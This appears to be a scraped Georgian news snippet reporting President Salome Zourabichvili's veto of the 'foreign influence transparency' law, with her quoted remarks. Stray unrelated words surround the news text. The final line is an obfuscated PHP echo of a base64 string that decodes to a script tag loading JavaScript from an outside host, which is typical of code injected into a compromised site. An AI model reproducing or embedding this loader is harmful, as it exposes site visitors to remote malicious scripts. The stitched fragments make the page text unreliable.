celsiusi
ავერსი შნაიდერი

 საქართველოს პრეზიდენტმა, სალომე ზურაბიშვილმა „უცხოური გავლენის გამჭვირვალობის შესახებ“ კანონს ვეტო დაადო. აღნიშნულის შესახებ მან ბრიფინგზე განაცხადა.

პრეზიდენტის განმარტებით, ვეტო იურიდიულად გამართულია და პარლამენტს დღესვე გადაეცემა.

„დღეს დავადე ვეტო „რუსულ კანონს“, რომელიც ეწინააღმდეგება ჩვენს კონსტიტუციას, ევროპულ სტანდარტებს და ამდენად, წარმოადგენს შეფერხებას ჩვენს ევროპულ გზაზე. ეს ვეტო არის სრულიად გამართული იურიდიულად და დღესვე გადაეცემა პარლამენტს. ეს კანონი არ ექვემდებარება არავითარ ცვლილებას, არავითარ გაუმჯობესებას და ამდენად, არის ძალიან მარტივი ვეტო. ეს კანონი უნდა გაუქმდეს“, – აღნიშნა პრეზიდენტმა.

168
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");